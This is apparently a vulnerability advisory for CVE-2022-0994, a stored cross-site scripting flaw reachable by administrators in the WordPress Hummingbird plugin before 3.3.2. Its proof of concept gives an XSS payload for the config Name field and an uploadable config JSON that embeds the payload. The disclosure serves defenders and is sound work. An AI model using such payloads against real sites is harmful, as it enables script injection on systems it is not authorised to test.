Authored by Taurus Omar

WordPress Hummingbird plugin versions prior to 3.3.2 suffers from a persistent cross site scripting vulnerability.

advisories | CVE-2022-0994

Tittle:
WordPress Plugin Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting

References:
CVE-2022-0994

Author:
Taurus Omar

Description:
The plugin does not sanitise and escape the Config Name, which could allow high privilege users, such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

Affects Plugins:
Hummingbird-performance - Fixed in version 3.3.2

Proof of Concept:
Go to Hummingbird's Settings > Configs > edit the "Name and Description" and put the following payload in the Name field: <img src onerror=alert(/XSS/)>

Save and Click 'Apply' to trigger the XSS

Go to Hummingbird's Settings > Configs and Upload the following config

{
"id": 1,
"name": "<img src onerror=alert(/XSS/)>",
"description": "Xss",
"config": {
"configs": {
"settings": {
"advanced": {
"query_string": false,
"emoji": false,
"cart_fragments": false,
"lazy_load": {
"enabled": false
}
},
"database": {
"reports": {
"enabled": false
}
},
"gravatar": {
"enabled": true
},
"page_cache": {
"enabled": true,
"detection": "auto",
"integrations": {
"varnish": false,
"opcache": false
},
"preload": false
},
"performance": [],
"rss": {
"enabled": true,
"duration": 3600
},
"settings": {
"accessible_colors": false,
"remove_settings": false,
"remove_data": false,
"control": true
},
"uptime": {
"enabled": false
}
}
},
"strings": {
"advanced": [
"Remove query strings from assets - InactivenRemove Emoji JS & CSS files - InactivenDisable WooCommerce cart fragments - InactivenComments lazy loading - Inactiven"
],
"database": [
""
],
"gravatar": [
"Gravatar cache - Activen"
],
"page_cache": [
"Page cache - ActivenFile change detection - AutonPurge Varnish cache - InactivenPurge OpCache - InactivenCache preloading - Inactiven"
],
"rss": [
"RSS caching - Activen"
],
"settings": [
"High contrast mode - InactivenRemove settings on uninstall - InactivenRemove data on uninstall - InactivenCache control in admin bar - Activen"
],
"uptime": [

"Uptime - Inactiven"
]
}
},

"plugin": "1081721"
}

Classification:
Type XSS
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79

wpScan:
https://wpscan.com/vulnerability/e9dd62fc-bb79-4a6b-b99c-60e40f010d7a